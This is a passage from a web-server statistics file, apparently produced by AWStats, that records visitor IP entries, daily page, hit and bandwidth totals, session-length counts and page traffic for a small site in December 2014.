194.28.180.57 2 3 749075 20141204180237
77.120.247.27 2 3 749075 20141212135403
93.75.66.124 2 3 749075 20141203061555
176.37.103.12 1 1 1998 20141201185225
176.36.67.136 2 3 749075 20141204124049
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20141201 36 52 6809399 21
20141202 26 34 5271855 15
20141203 31 42 7510778 17
20141204 29 36 5273495 20
20141205 16 19 3005932 9
20141206 12 14 773409 10
20141207 10 10 754711 9
20141208 15 21 2284263 12
20141209 35 48 8278503 15
20141210 18 23 2283905 13
20141211 27 37 6763546 15
20141212 30 36 3791687 24
20141213 13 16 1522484 10
20141214 17 23 3026986 12
20141215 31 42 5300901 17
20141216 37 47 4563814 18
20141217 18 23 3761359 11
20141218 32 36 2305525 25
20141219 19 24 3761359 13
20141220 15 20 2277911 12
20141221 11 16 2269919 8
20141222 12 15 1520486 10
20141223 7 8 759065 6
20141224 10 11 763061 8
20141225 26 33 1565516 21
20141226 17 24 2281907 12
20141227 9 11 1508140 6
20141228 11 14 1518488 7
20141229 15 18 2265207 11
20141230 10 13 2255217 8
20141231 9 13 2259571 6
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
1h+ 1
5mn-15mn 8
2mn-5mn 6
30s-2mn 13
0s-30s 370
30mn-1h 3
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 2
/ 473 923124 396 290
/index.swf 131 96294250 5 111
END_SIDER
